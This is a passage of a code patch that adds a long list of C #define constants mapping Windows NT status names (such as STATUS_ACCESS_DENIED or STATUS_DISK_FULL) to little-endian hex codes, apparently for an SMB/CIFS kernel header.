++#define STATUS_GRAPHICS_POLLING_TOO_FREQUENTLY cpu_to_le32(0x401E0439)
++#define STATUS_GRAPHICS_START_DEFERRED cpu_to_le32(0x401E043A)
++#define STATUS_NDIS_INDICATION_REQUIRED cpu_to_le32(0x40230001)
++#define STATUS_GUARD_PAGE_VIOLATION cpu_to_le32(0x80000001)
++#define STATUS_DATATYPE_MISALIGNMENT cpu_to_le32(0x80000002)
++#define STATUS_BREAKPOINT cpu_to_le32(0x80000003)
++#define STATUS_SINGLE_STEP cpu_to_le32(0x80000004)
++#define STATUS_BUFFER_OVERFLOW cpu_to_le32(0x80000005)
++#define STATUS_NO_MORE_FILES cpu_to_le32(0x80000006)
++#define STATUS_WAKE_SYSTEM_DEBUGGER cpu_to_le32(0x80000007)
++#define STATUS_HANDLES_CLOSED cpu_to_le32(0x8000000A)
++#define STATUS_NO_INHERITANCE cpu_to_le32(0x8000000B)
++#define STATUS_GUID_SUBSTITUTION_MADE cpu_to_le32(0x8000000C)
++#define STATUS_PARTIAL_COPY cpu_to_le32(0x8000000D)
++#define STATUS_DEVICE_PAPER_EMPTY cpu_to_le32(0x8000000E)
++#define STATUS_DEVICE_POWERED_OFF cpu_to_le32(0x8000000F)
++#define STATUS_DEVICE_OFF_LINE cpu_to_le32(0x80000010)
++#define STATUS_DEVICE_BUSY cpu_to_le32(0x80000011)
++#define STATUS_NO_MORE_EAS cpu_to_le32(0x80000012)
++#define STATUS_INVALID_EA_NAME cpu_to_le32(0x80000013)
++#define STATUS_EA_LIST_INCONSISTENT cpu_to_le32(0x80000014)
++#define STATUS_INVALID_EA_FLAG cpu_to_le32(0x80000015)
++#define STATUS_VERIFY_REQUIRED cpu_to_le32(0x80000016)
++#define STATUS_EXTRANEOUS_INFORMATION cpu_to_le32(0x80000017)
++#define STATUS_RXACT_COMMIT_NECESSARY cpu_to_le32(0x80000018)
++#define STATUS_NO_MORE_ENTRIES cpu_to_le32(0x8000001A)
++#define STATUS_FILEMARK_DETECTED cpu_to_le32(0x8000001B)
++#define STATUS_MEDIA_CHANGED cpu_to_le32(0x8000001C)
++#define STATUS_BUS_RESET cpu_to_le32(0x8000001D)
++#define STATUS_END_OF_MEDIA cpu_to_le32(0x8000001E)
++#define STATUS_BEGINNING_OF_MEDIA cpu_to_le32(0x8000001F)
++#define STATUS_MEDIA_CHECK cpu_to_le32(0x80000020)
++#define STATUS_SETMARK_DETECTED cpu_to_le32(0x80000021)
++#define STATUS_NO_DATA_DETECTED cpu_to_le32(0x80000022)
++#define STATUS_REDIRECTOR_HAS_OPEN_HANDLES cpu_to_le32(0x80000023)
++#define STATUS_SERVER_HAS_OPEN_HANDLES cpu_to_le32(0x80000024)
++#define STATUS_ALREADY_DISCONNECTED cpu_to_le32(0x80000025)
++#define STATUS_LONGJUMP cpu_to_le32(0x80000026)
++#define STATUS_CLEANER_CARTRIDGE_INSTALLED cpu_to_le32(0x80000027)
++#define STATUS_PLUGPLAY_QUERY_VETOED cpu_to_le32(0x80000028)
++#define STATUS_UNWIND_CONSOLIDATE cpu_to_le32(0x80000029)
++#define STATUS_REGISTRY_HIVE_RECOVERED cpu_to_le32(0x8000002A)
++#define STATUS_DLL_MIGHT_BE_INSECURE cpu_to_le32(0x8000002B)
++#define STATUS_DLL_MIGHT_BE_INCOMPATIBLE cpu_to_le32(0x8000002C)
++#define STATUS_STOPPED_ON_SYMLINK cpu_to_le32(0x8000002D)
++#define STATUS_DEVICE_REQUIRES_CLEANING cpu_to_le32(0x80000288)
++#define STATUS_DEVICE_DOOR_OPEN cpu_to_le32(0x80000289)
++#define STATUS_DATA_LOST_REPAIR cpu_to_le32(0x80000803)
++#define DBG_EXCEPTION_NOT_HANDLED cpu_to_le32(0x80010001)
++#define STATUS_CLUSTER_NODE_ALREADY_UP cpu_to_le32(0x80130001)
++#define STATUS_CLUSTER_NODE_ALREADY_DOWN cpu_to_le32(0x80130002)
++#define STATUS_CLUSTER_NETWORK_ALREADY_ONLINE cpu_to_le32(0x80130003)
++#define STATUS_CLUSTER_NETWORK_ALREADY_OFFLINE cpu_to_le32(0x80130004)
++#define STATUS_CLUSTER_NODE_ALREADY_MEMBER cpu_to_le32(0x80130005)
++#define STATUS_COULD_NOT_RESIZE_LOG cpu_to_le32(0x80190009)
++#define STATUS_NO_TXF_METADATA cpu_to_le32(0x80190029)
++#define STATUS_CANT_RECOVER_WITH_HANDLE_OPEN cpu_to_le32(0x80190031)
++#define STATUS_TXF_METADATA_ALREADY_PRESENT cpu_to_le32(0x80190041)
++#define STATUS_TRANSACTION_SCOPE_CALLBACKS_NOT_SET cpu_to_le32(0x80190042)
++#define STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD_RECOVERED	\
++	cpu_to_le32(0x801B00EB)
++#define STATUS_FLT_BUFFER_TOO_SMALL cpu_to_le32(0x801C0001)
++#define STATUS_FVE_PARTIAL_METADATA cpu_to_le32(0x80210001)
++#define STATUS_UNSUCCESSFUL cpu_to_le32(0xC0000001)
++#define STATUS_NOT_IMPLEMENTED cpu_to_le32(0xC0000002)
++#define STATUS_INVALID_INFO_CLASS cpu_to_le32(0xC0000003)
++#define STATUS_INFO_LENGTH_MISMATCH cpu_to_le32(0xC0000004)
++#define STATUS_ACCESS_VIOLATION cpu_to_le32(0xC0000005)
++#define STATUS_IN_PAGE_ERROR cpu_to_le32(0xC0000006)
++#define STATUS_PAGEFILE_QUOTA cpu_to_le32(0xC0000007)
++#define STATUS_INVALID_HANDLE cpu_to_le32(0xC0000008)
++#define STATUS_BAD_INITIAL_STACK cpu_to_le32(0xC0000009)
++#define STATUS_BAD_INITIAL_PC cpu_to_le32(0xC000000A)
++#define STATUS_INVALID_CID cpu_to_le32(0xC000000B)
++#define STATUS_TIMER_NOT_CANCELED cpu_to_le32(0xC000000C)
++#define STATUS_INVALID_PARAMETER cpu_to_le32(0xC000000D)
++#define STATUS_NO_SUCH_DEVICE cpu_to_le32(0xC000000E)
++#define STATUS_NO_SUCH_FILE cpu_to_le32(0xC000000F)
++#define STATUS_INVALID_DEVICE_REQUEST cpu_to_le32(0xC0000010)
++#define STATUS_END_OF_FILE cpu_to_le32(0xC0000011)
++#define STATUS_WRONG_VOLUME cpu_to_le32(0xC0000012)
++#define STATUS_NO_MEDIA_IN_DEVICE cpu_to_le32(0xC0000013)
++#define STATUS_UNRECOGNIZED_MEDIA cpu_to_le32(0xC0000014)
++#define STATUS_NONEXISTENT_SECTOR cpu_to_le32(0xC0000015)
++#define STATUS_MORE_PROCESSING_REQUIRED cpu_to_le32(0xC0000016)
++#define STATUS_NO_MEMORY cpu_to_le32(0xC0000017)
++#define STATUS_CONFLICTING_ADDRESSES cpu_to_le32(0xC0000018)
++#define STATUS_NOT_MAPPED_VIEW cpu_to_le32(0xC0000019)
++#define STATUS_UNABLE_TO_FREE_VM cpu_to_le32(0xC000001A)
++#define STATUS_UNABLE_TO_DELETE_SECTION cpu_to_le32(0xC000001B)
++#define STATUS_INVALID_SYSTEM_SERVICE cpu_to_le32(0xC000001C)
++#define STATUS_ILLEGAL_INSTRUCTION cpu_to_le32(0xC000001D)
++#define STATUS_INVALID_LOCK_SEQUENCE cpu_to_le32(0xC000001E)
++#define STATUS_INVALID_VIEW_SIZE cpu_to_le32(0xC000001F)
++#define STATUS_INVALID_FILE_FOR_SECTION cpu_to_le32(0xC0000020)
++#define STATUS_ALREADY_COMMITTED cpu_to_le32(0xC0000021)
++#define STATUS_ACCESS_DENIED cpu_to_le32(0xC0000022)
++#define STATUS_BUFFER_TOO_SMALL cpu_to_le32(0xC0000023)
++#define STATUS_OBJECT_TYPE_MISMATCH cpu_to_le32(0xC0000024)
++#define STATUS_NONCONTINUABLE_EXCEPTION cpu_to_le32(0xC0000025)
++#define STATUS_INVALID_DISPOSITION cpu_to_le32(0xC0000026)
++#define STATUS_UNWIND cpu_to_le32(0xC0000027)
++#define STATUS_BAD_STACK cpu_to_le32(0xC0000028)
++#define STATUS_INVALID_UNWIND_TARGET cpu_to_le32(0xC0000029)
++#define STATUS_NOT_LOCKED cpu_to_le32(0xC000002A)
++#define STATUS_PARITY_ERROR cpu_to_le32(0xC000002B)
++#define STATUS_UNABLE_TO_DECOMMIT_VM cpu_to_le32(0xC000002C)
++#define STATUS_NOT_COMMITTED cpu_to_le32(0xC000002D)
++#define STATUS_INVALID_PORT_ATTRIBUTES cpu_to_le32(0xC000002E)
++#define STATUS_PORT_MESSAGE_TOO_LONG cpu_to_le32(0xC000002F)
++#define STATUS_INVALID_PARAMETER_MIX cpu_to_le32(0xC0000030)
++#define STATUS_INVALID_QUOTA_LOWER cpu_to_le32(0xC0000031)
++#define STATUS_DISK_CORRUPT_ERROR cpu_to_le32(0xC0000032)
++#define STATUS_OBJECT_NAME_INVALID cpu_to_le32(0xC0000033)
++#define STATUS_OBJECT_NAME_NOT_FOUND cpu_to_le32(0xC0000034)
++#define STATUS_OBJECT_NAME_COLLISION cpu_to_le32(0xC0000035)
++#define STATUS_PORT_DISCONNECTED cpu_to_le32(0xC0000037)
++#define STATUS_DEVICE_ALREADY_ATTACHED cpu_to_le32(0xC0000038)
++#define STATUS_OBJECT_PATH_INVALID cpu_to_le32(0xC0000039)
++#define STATUS_OBJECT_PATH_NOT_FOUND cpu_to_le32(0xC000003A)
++#define STATUS_OBJECT_PATH_SYNTAX_BAD cpu_to_le32(0xC000003B)
++#define STATUS_DATA_OVERRUN cpu_to_le32(0xC000003C)
++#define STATUS_DATA_LATE_ERROR cpu_to_le32(0xC000003D)
++#define STATUS_DATA_ERROR cpu_to_le32(0xC000003E)
++#define STATUS_CRC_ERROR cpu_to_le32(0xC000003F)
++#define STATUS_SECTION_TOO_BIG cpu_to_le32(0xC0000040)
++#define STATUS_PORT_CONNECTION_REFUSED cpu_to_le32(0xC0000041)
++#define STATUS_INVALID_PORT_HANDLE cpu_to_le32(0xC0000042)
++#define STATUS_SHARING_VIOLATION cpu_to_le32(0xC0000043)
++#define STATUS_QUOTA_EXCEEDED cpu_to_le32(0xC0000044)
++#define STATUS_INVALID_PAGE_PROTECTION cpu_to_le32(0xC0000045)
++#define STATUS_MUTANT_NOT_OWNED cpu_to_le32(0xC0000046)
++#define STATUS_SEMAPHORE_LIMIT_EXCEEDED cpu_to_le32(0xC0000047)
++#define STATUS_PORT_ALREADY_SET cpu_to_le32(0xC0000048)
++#define STATUS_SECTION_NOT_IMAGE cpu_to_le32(0xC0000049)
++#define STATUS_SUSPEND_COUNT_EXCEEDED cpu_to_le32(0xC000004A)
++#define STATUS_THREAD_IS_TERMINATING cpu_to_le32(0xC000004B)
++#define STATUS_BAD_WORKING_SET_LIMIT cpu_to_le32(0xC000004C)
++#define STATUS_INCOMPATIBLE_FILE_MAP cpu_to_le32(0xC000004D)
++#define STATUS_SECTION_PROTECTION cpu_to_le32(0xC000004E)
++#define STATUS_EAS_NOT_SUPPORTED cpu_to_le32(0xC000004F)
++#define STATUS_EA_TOO_LARGE cpu_to_le32(0xC0000050)
++#define STATUS_NONEXISTENT_EA_ENTRY cpu_to_le32(0xC0000051)
++#define STATUS_NO_EAS_ON_FILE cpu_to_le32(0xC0000052)
++#define STATUS_EA_CORRUPT_ERROR cpu_to_le32(0xC0000053)
++#define STATUS_FILE_LOCK_CONFLICT cpu_to_le32(0xC0000054)
++#define STATUS_LOCK_NOT_GRANTED cpu_to_le32(0xC0000055)
++#define STATUS_DELETE_PENDING cpu_to_le32(0xC0000056)
++#define STATUS_CTL_FILE_NOT_SUPPORTED cpu_to_le32(0xC0000057)
++#define STATUS_UNKNOWN_REVISION cpu_to_le32(0xC0000058)
++#define STATUS_REVISION_MISMATCH cpu_to_le32(0xC0000059)
++#define STATUS_INVALID_OWNER cpu_to_le32(0xC000005A)
++#define STATUS_INVALID_PRIMARY_GROUP cpu_to_le32(0xC000005B)
++#define STATUS_NO_IMPERSONATION_TOKEN cpu_to_le32(0xC000005C)
++#define STATUS_CANT_DISABLE_MANDATORY cpu_to_le32(0xC000005D)
++#define STATUS_NO_LOGON_SERVERS cpu_to_le32(0xC000005E)
++#define STATUS_NO_SUCH_LOGON_SESSION cpu_to_le32(0xC000005F)
++#define STATUS_NO_SUCH_PRIVILEGE cpu_to_le32(0xC0000060)
++#define STATUS_PRIVILEGE_NOT_HELD cpu_to_le32(0xC0000061)
++#define STATUS_INVALID_ACCOUNT_NAME cpu_to_le32(0xC0000062)
++#define STATUS_USER_EXISTS cpu_to_le32(0xC0000063)
++#define STATUS_NO_SUCH_USER cpu_to_le32(0xC0000064)
++#define STATUS_GROUP_EXISTS cpu_to_le32(0xC0000065)
++#define STATUS_NO_SUCH_GROUP cpu_to_le32(0xC0000066)
++#define STATUS_MEMBER_IN_GROUP cpu_to_le32(0xC0000067)
++#define STATUS_MEMBER_NOT_IN_GROUP cpu_to_le32(0xC0000068)
++#define STATUS_LAST_ADMIN cpu_to_le32(0xC0000069)
++#define STATUS_WRONG_PASSWORD cpu_to_le32(0xC000006A)
++#define STATUS_ILL_FORMED_PASSWORD cpu_to_le32(0xC000006B)
++#define STATUS_PASSWORD_RESTRICTION cpu_to_le32(0xC000006C)
++#define STATUS_LOGON_FAILURE cpu_to_le32(0xC000006D)
++#define STATUS_ACCOUNT_RESTRICTION cpu_to_le32(0xC000006E)
++#define STATUS_INVALID_LOGON_HOURS cpu_to_le32(0xC000006F)
++#define STATUS_INVALID_WORKSTATION cpu_to_le32(0xC0000070)
++#define STATUS_PASSWORD_EXPIRED cpu_to_le32(0xC0000071)
++#define STATUS_ACCOUNT_DISABLED cpu_to_le32(0xC0000072)
++#define STATUS_NONE_MAPPED cpu_to_le32(0xC0000073)
++#define STATUS_TOO_MANY_LUIDS_REQUESTED cpu_to_le32(0xC0000074)
++#define STATUS_LUIDS_EXHAUSTED cpu_to_le32(0xC0000075)
++#define STATUS_INVALID_SUB_AUTHORITY cpu_to_le32(0xC0000076)
++#define STATUS_INVALID_ACL cpu_to_le32(0xC0000077)
++#define STATUS_INVALID_SID cpu_to_le32(0xC0000078)
++#define STATUS_INVALID_SECURITY_DESCR cpu_to_le32(0xC0000079)
++#define STATUS_PROCEDURE_NOT_FOUND cpu_to_le32(0xC000007A)
++#define STATUS_INVALID_IMAGE_FORMAT cpu_to_le32(0xC000007B)
++#define STATUS_NO_TOKEN cpu_to_le32(0xC000007C)
++#define STATUS_BAD_INHERITANCE_ACL cpu_to_le32(0xC000007D)
++#define STATUS_RANGE_NOT_LOCKED cpu_to_le32(0xC000007E)
++#define STATUS_DISK_FULL cpu_to_le32(0xC000007F)
++#define STATUS_SERVER_DISABLED cpu_to_le32(0xC0000080)
++#define STATUS_SERVER_NOT_DISABLED cpu_to_le32(0xC0000081)
++#define STATUS_TOO_MANY_GUIDS_REQUESTED cpu_to_le32(0xC0000082)
++#define STATUS_GUIDS_EXHAUSTED cpu_to_le32(0xC0000083)
++#define STATUS_INVALID_ID_AUTHORITY cpu_to_le32(0xC0000084)
++#define STATUS_AGENTS_EXHAUSTED cpu_to_le32(0xC0000085)
++#define STATUS_INVALID_VOLUME_LABEL cpu_to_le32(0xC0000086)
++#define STATUS_SECTION_NOT_EXTENDED cpu_to_le32(0xC0000087)
++#define STATUS_NOT_MAPPED_DATA cpu_to_le32(0xC0000088)
++#define STATUS_RESOURCE_DATA_NOT_FOUND cpu_to_le32(0xC0000089)
++#define STATUS_RESOURCE_TYPE_NOT_FOUND cpu_to_le32(0xC000008A)
++#define STATUS_RESOURCE_NAME_NOT_FOUND cpu_to_le32(0xC000008B)
++#define STATUS_ARRAY_BOUNDS_EXCEEDED cpu_to_le32(0xC000008C)
++#define STATUS_FLOAT_DENORMAL_OPERAND cpu_to_le32(0xC000008D)
++#define STATUS_FLOAT_DIVIDE_BY_ZERO cpu_to_le32(0xC000008E)
++#define STATUS_FLOAT_INEXACT_RESULT cpu_to_le32(0xC000008F)
++#define STATUS_FLOAT_INVALID_OPERATION cpu_to_le32(0xC0000090)
++#define STATUS_FLOAT_OVERFLOW cpu_to_le32(0xC0000091)
++#define STATUS_FLOAT_STACK_CHECK cpu_to_le32(0xC0000092)
++#define STATUS_FLOAT_UNDERFLOW cpu_to_le32(0xC0000093)
++#define STATUS_INTEGER_DIVIDE_BY_ZERO cpu_to_le32(0xC0000094)
++#define STATUS_INTEGER_OVERFLOW cpu_to_le32(0xC0000095)
++#define STATUS_PRIVILEGED_INSTRUCTION cpu_to_le32(0xC0000096)
++#define STATUS_TOO_MANY_PAGING_FILES cpu_to_le32(0xC0000097)
++#define STATUS_FILE_INVALID cpu_to_le32(0xC0000098)
++#define STATUS_ALLOTTED_SPACE_EXCEEDED cpu_to_le32(0xC0000099)
++#define STATUS_INSUFFICIENT_RESOURCES cpu_to_le32(0xC000009A)
++#define STATUS_DFS_EXIT_PATH_FOUND cpu_to_le32(0xC000009B)
++#define STATUS_DEVICE_DATA_ERROR cpu_to_le32(0xC000009C)
++#define STATUS_DEVICE_NOT_CONNECTED cpu_to_le32(0xC000009D)
++#define STATUS_DEVICE_POWER_FAILURE cpu_to_le32(0xC000009E)
++#define STATUS_FREE_VM_NOT_AT_BASE cpu_to_le32(0xC000009F)
++#define STATUS_MEMORY_NOT_ALLOCATED cpu_to_le32(0xC00000A0)
++#define STATUS_WORKING_SET_QUOTA cpu_to_le32(0xC00000A1)
++#define STATUS_MEDIA_WRITE_PROTECTED cpu_to_le32(0xC00000A2)
++#define STATUS_DEVICE_NOT_READY cpu_to_le32(0xC00000A3)
++#define STATUS_INVALID_GROUP_ATTRIBUTES cpu_to_le32(0xC00000A4)
++#define STATUS_BAD_IMPERSONATION_LEVEL cpu_to_le32(0xC00000A5)
++#define STATUS_CANT_OPEN_ANONYMOUS cpu_to_le32(0xC00000A6)
++#define STATUS_BAD_VALIDATION_CLASS cpu_to_le32(0xC00000A7)
++#define STATUS_BAD_TOKEN_TYPE cpu_to_le32(0xC00000A8)
++#define STATUS_BAD_MASTER_BOOT_RECORD cpu_to_le32(0xC00000A9)
++#define STATUS_INSTRUCTION_MISALIGNMENT cpu_to_le32(0xC00000AA)
++#define STATUS_INSTANCE_NOT_AVAILABLE cpu_to_le32(0xC00000AB)
++#define STATUS_PIPE_NOT_AVAILABLE cpu_to_le32(0xC00000AC)
++#define STATUS_INVALID_PIPE_STATE cpu_to_le32(0xC00000AD)
++#define STATUS_PIPE_BUSY cpu_to_le32(0xC00000AE)
++#define STATUS_ILLEGAL_FUNCTION cpu_to_le32(0xC00000AF)
++#define STATUS_PIPE_DISCONNECTED cpu_to_le32(0xC00000B0)
++#define STATUS_PIPE_CLOSING cpu_to_le32(0xC00000B1)
++#define STATUS_PIPE_CONNECTED cpu_to_le32(0xC00000B2)
++#define STATUS_PIPE_LISTENING cpu_to_le32(0xC00000B3)
++#define STATUS_INVALID_READ_MODE cpu_to_le32(0xC00000B4)
++#define STATUS_IO_TIMEOUT cpu_to_le32(0xC00000B5)
++#define STATUS_FILE_FORCED_CLOSED cpu_to_le32(0xC00000B6)
++#define STATUS_PROFILING_NOT_STARTED cpu_to_le32(0xC00000B7)
++#define STATUS_PROFILING_NOT_STOPPED cpu_to_le32(0xC00000B8)
++#define STATUS_COULD_NOT_INTERPRET cpu_to_le32(0xC00000B9)
++#define STATUS_FILE_IS_A_DIRECTORY cpu_to_le32(0xC00000BA)
++#define STATUS_NOT_SUPPORTED cpu_to_le32(0xC00000BB)
++#define STATUS_REMOTE_NOT_LISTENING cpu_to_le32(0xC00000BC)
++#define STATUS_DUPLICATE_NAME cpu_to_le32(0xC00000BD)
++#define STATUS_BAD_NETWORK_PATH cpu_to_le32(0xC00000BE)
++#define STATUS_NETWORK_BUSY cpu_to_le32(0xC00000BF)
++#define STATUS_DEVICE_DOES_NOT_EXIST cpu_to_le32(0xC00000C0)
++#define STATUS_TOO_MANY_COMMANDS cpu_to_le32(0xC00000C1)
++#define STATUS_ADAPTER_HARDWARE_ERROR cpu_to_le32(0xC00000C2)
++#define STATUS_INVALID_NETWORK_RESPONSE cpu_to_le32(0xC00000C3)
++#define STATUS_UNEXPECTED_NETWORK_ERROR cpu_to_le32(0xC00000C4)
++#define STATUS_BAD_REMOTE_ADAPTER cpu_to_le32(0xC00000C5)
++#define STATUS_PRINT_QUEUE_FULL cpu_to_le32(0xC00000C6)
++#define STATUS_NO_SPOOL_SPACE cpu_to_le32(0xC00000C7)
++#define STATUS_PRINT_CANCELLED cpu_to_le32(0xC00000C8)
++#define STATUS_NETWORK_NAME_DELETED cpu_to_le32(0xC00000C9)
++#define STATUS_NETWORK_ACCESS_DENIED cpu_to_le32(0xC00000CA)
++#define STATUS_BAD_DEVICE_TYPE cpu_to_le32(0xC00000CB)
++#define STATUS_BAD_NETWORK_NAME cpu_to_le32(0xC00000CC)
++#define STATUS_TOO_MANY_NAMES cpu_to_le32(0xC00000CD)
++#define STATUS_TOO_MANY_SESSIONS cpu_to_le32(0xC00000CE)
++#define STATUS_SHARING_PAUSED cpu_to_le32(0xC00000CF)
++#define STATUS_REQUEST_NOT_ACCEPTED cpu_to_le32(0xC00000D0)
++#define STATUS_REDIRECTOR_PAUSED cpu_to_le32(0xC00000D1)
++#define STATUS_NET_WRITE_FAULT cpu_to_le32(0xC00000D2)
++#define STATUS_PROFILING_AT_LIMIT cpu_to_le32(0xC00000D3)
++#define STATUS_NOT_SAME_DEVICE cpu_to_le32(0xC00000D4)
++#define STATUS_FILE_RENAMED cpu_to_le32(0xC00000D5)
++#define STATUS_VIRTUAL_CIRCUIT_CLOSED cpu_to_le32(0xC00000D6)
++#define STATUS_NO_SECURITY_ON_OBJECT cpu_to_le32(0xC00000D7)
++#define STATUS_CANT_WAIT cpu_to_le32(0xC00000D8)
++#define STATUS_PIPE_EMPTY cpu_to_le32(0xC00000D9)
++#define STATUS_CANT_ACCESS_DOMAIN_INFO cpu_to_le32(0xC00000DA)
++#define STATUS_CANT_TERMINATE_SELF cpu_to_le32(0xC00000DB)
++#define STATUS_INVALID_SERVER_STATE cpu_to_le32(0xC00000DC)
++#define STATUS_INVALID_DOMAIN_STATE cpu_to_le32(0xC00000DD)
++#define STATUS_INVALID_DOMAIN_ROLE cpu_to_le32(0xC00000DE)
++#define STATUS_NO_SUCH_DOMAIN cpu_to_le32(0xC00000DF)
++#define STATUS_DOMAIN_EXISTS cpu_to_le32(0xC00000E0)
++#define STATUS_DOMAIN_LIMIT_EXCEEDED cpu_to_le32(0xC00000E1)
++#define STATUS_OPLOCK_NOT_GRANTED cpu_to_le32(0xC00000E2)
++#define STATUS_INVALID_OPLOCK_PROTOCOL cpu_to_le32(0xC00000E3)
++#define STATUS_INTERNAL_DB_CORRUPTION cpu_to_le32(0xC00000E4)
++#define STATUS_INTERNAL_ERROR cpu_to_le32(0xC00000E5)
++#define STATUS_GENERIC_NOT_MAPPED cpu_to_le32(0xC00000E6)
++#define STATUS_BAD_DESCRIPTOR_FORMAT cpu_to_le32(0xC00000E7)
++#define STATUS_INVALID_USER_BUFFER cpu_to_le32(0xC00000E8)
++#define STATUS_UNEXPECTED_IO_ERROR cpu_to_le32(0xC00000E9)
++#define STATUS_UNEXPECTED_MM_CREATE_ERR cpu_to_le32(0xC00000EA)
++#define STATUS_UNEXPECTED_MM_MAP_ERROR cpu_to_le32(0xC00000EB)
++#define STATUS_UNEXPECTED_MM_EXTEND_ERR cpu_to_le32(0xC00000EC)
++#define STATUS_NOT_LOGON_PROCESS cpu_to_le32(0xC00000ED)
++#define STATUS_LOGON_SESSION_EXISTS cpu_to_le32(0xC00000EE)
++#define STATUS_INVALID_PARAMETER_1 cpu_to_le32(0xC00000EF)
++#define STATUS_INVALID_PARAMETER_2 cpu_to_le32(0xC00000F0)
++#define STATUS_INVALID_PARAMETER_3 cpu_to_le32(0xC00000F1)
++#define STATUS_INVALID_PARAMETER_4 cpu_to_le32(0xC00000F2)
++#define STATUS_INVALID_PARAMETER_5 cpu_to_le32(0xC00000F3)
++#define STATUS_INVALID_PARAMETER_6 cpu_to_le32(0xC00000F4)
++#define STATUS_INVALID_PARAMETER_7 cpu_to_le32(0xC00000F5)
++#define STATUS_INVALID_PARAMETER_8 cpu_to_le32(0xC00000F6)
++#define STATUS_INVALID_PARAMETER_9 cpu_to_le32(0xC00000F7)
++#define STATUS_INVALID_PARAMETER_10 cpu_to_le32(0xC00000F8)
++#define STATUS_INVALID_PARAMETER_11 cpu_to_le32(0xC00000F9)
++#define STATUS_INVALID_PARAMETER_12 cpu_to_le32(0xC00000FA)
++#define STATUS_REDIRECTOR_NOT_STARTED cpu_to_le32(0xC00000FB)
++#define STATUS_REDIRECTOR_STARTED cpu_to_le32(0xC00000FC)
++#define STATUS_STACK_OVERFLOW cpu_to_le32(0xC00000FD)
++#define STATUS_NO_SUCH_PACKAGE cpu_to_le32(0xC00000FE)
++#define STATUS_BAD_FUNCTION_TABLE cpu_to_le32(0xC00000FF)
++#define STATUS_VARIABLE_NOT_FOUND cpu_to_le32(0xC0000100)
++#define STATUS_DIRECTORY_NOT_EMPTY cpu_to_le32(0xC0000101)
++#define STATUS_FILE_CORRUPT_ERROR cpu_to_le32(0xC0000102)
++#define STATUS_NOT_A_DIRECTORY cpu_to_le32(0xC0000103)
++#define STATUS_BAD_LOGON_SESSION_STATE cpu_to_le32(0xC0000104)
++#define STATUS_LOGON_SESSION_COLLISION cpu_to_le32(0xC0000105)
++#define STATUS_NAME_TOO_LONG cpu_to_le32(0xC0000106)
++#define STATUS_FILES_OPEN cpu_to_le32(0xC0000107)
++#define STATUS_CONNECTION_IN_USE cpu_to_le32(0xC0000108)
++#define STATUS_MESSAGE_NOT_FOUND cpu_to_le32(0xC0000109)
++#define STATUS_PROCESS_IS_TERMINATING cpu_to_le32(0xC000010A)
++#define STATUS_INVALID_LOGON_TYPE cpu_to_le32(0xC000010B)
++#define STATUS_NO_GUID_TRANSLATION cpu_to_le32(0xC000010C)
++#define STATUS_CANNOT_IMPERSONATE cpu_to_le32(0xC000010D)
++#define STATUS_IMAGE_ALREADY_LOADED cpu_to_le32(0xC000010E)
++#define STATUS_ABIOS_NOT_PRESENT cpu_to_le32(0xC000010F)
++#define STATUS_ABIOS_LID_NOT_EXIST cpu_to_le32(0xC0000110)
++#define STATUS_ABIOS_LID_ALREADY_OWNED cpu_to_le32(0xC0000111)
++#define STATUS_ABIOS_NOT_LID_OWNER cpu_to_le32(0xC0000112)
++#define STATUS_ABIOS_INVALID_COMMAND cpu_to_le32(0xC0000113)
++#define STATUS_ABIOS_INVALID_LID cpu_to_le32(0xC0000114)
++#define STATUS_ABIOS_SELECTOR_NOT_AVAILABLE cpu_to_le32(0xC0000115)
++#define STATUS_ABIOS_INVALID_SELECTOR cpu_to_le32(0xC0000116)
++#define STATUS_NO_LDT cpu_to_le32(0xC0000117)
++#define STATUS_INVALID_LDT_SIZE cpu_to_le32(0xC0000118)
++#define STATUS_INVALID_LDT_OFFSET cpu_to_le32(0xC0000119)
++#define STATUS_INVALID_LDT_DESCRIPTOR cpu_to_le32(0xC000011A)
++#define STATUS_INVALID_IMAGE_NE_FORMAT cpu_to_le32(0xC000011B)
++#define STATUS_RXACT_INVALID_STATE cpu_to_le32(0xC000011C)
++#define STATUS_RXACT_COMMIT_FAILURE cpu_to_le32(0xC000011D)
++#define STATUS_MAPPED_FILE_SIZE_ZERO cpu_to_le32(0xC000011E)
++#define STATUS_TOO_MANY_OPENED_FILES cpu_to_le32(0xC000011F)
++#define STATUS_CANCELLED cpu_to_le32(0xC0000120)
++#define STATUS_CANNOT_DELETE cpu_to_le32(0xC0000121)
++#define STATUS_INVALID_COMPUTER_NAME cpu_to_le32(0xC0000122)
++#define STATUS_FILE_DELETED cpu_to_le32(0xC0000123)
++#define STATUS_SPECIAL_ACCOUNT cpu_to_le32(0xC0000124)
++#define STATUS_SPECIAL_GROUP cpu_to_le32(0xC0000125)
++#define STATUS_SPECIAL_USER cpu_to_le32(0xC0000126)
++#define STATUS_MEMBERS_PRIMARY_GROUP cpu_to_le32(0xC0000127)
++#define STATUS_FILE_CLOSED cpu_to_le32(0xC0000128)
++#define STATUS_TOO_MANY_THREADS cpu_to_le32(0xC0000129)
++#define STATUS_THREAD_NOT_IN_PROCESS cpu_to_le32(0xC000012A)
++#define STATUS_TOKEN_ALREADY_IN_USE cpu_to_le32(0xC000012B)
++#define STATUS_PAGEFILE_QUOTA_EXCEEDED cpu_to_le32(0xC000012C)
++#define STATUS_COMMITMENT_LIMIT cpu_to_le32(0xC000012D)
++#define STATUS_INVALID_IMAGE_LE_FORMAT cpu_to_le32(0xC000012E)
++#define STATUS_INVALID_IMAGE_NOT_MZ cpu_to_le32(0xC000012F)
++#define STATUS_INVALID_IMAGE_PROTECT cpu_to_le32(0xC0000130)
++#define STATUS_INVALID_IMAGE_WIN_16 cpu_to_le32(0xC0000131)
++#define STATUS_LOGON_SERVER_CONFLICT cpu_to_le32(0xC0000132)
++#define STATUS_TIME_DIFFERENCE_AT_DC cpu_to_le32(0xC0000133)
++#define STATUS_SYNCHRONIZATION_REQUIRED cpu_to_le32(0xC0000134)
++#define STATUS_DLL_NOT_FOUND cpu_to_le32(0xC0000135)
++#define STATUS_OPEN_FAILED cpu_to_le32(0xC0000136)
++#define STATUS_IO_PRIVILEGE_FAILED cpu_to_le32(0xC0000137)
++#define STATUS_ORDINAL_NOT_FOUND cpu_to_le32(0xC0000138)
++#define STATUS_ENTRYPOINT_NOT_FOUND cpu_to_le32(0xC0000139)
++#define STATUS_CONTROL_C_EXIT cpu_to_le32(0xC000013A)
++#define STATUS_LOCAL_DISCONNECT cpu_to_le32(0xC000013B)
++#define STATUS_REMOTE_DISCONNECT cpu_to_le32(0xC000013C)
++#define STATUS_REMOTE_RESOURCES cpu_to_le32(0xC000013D)
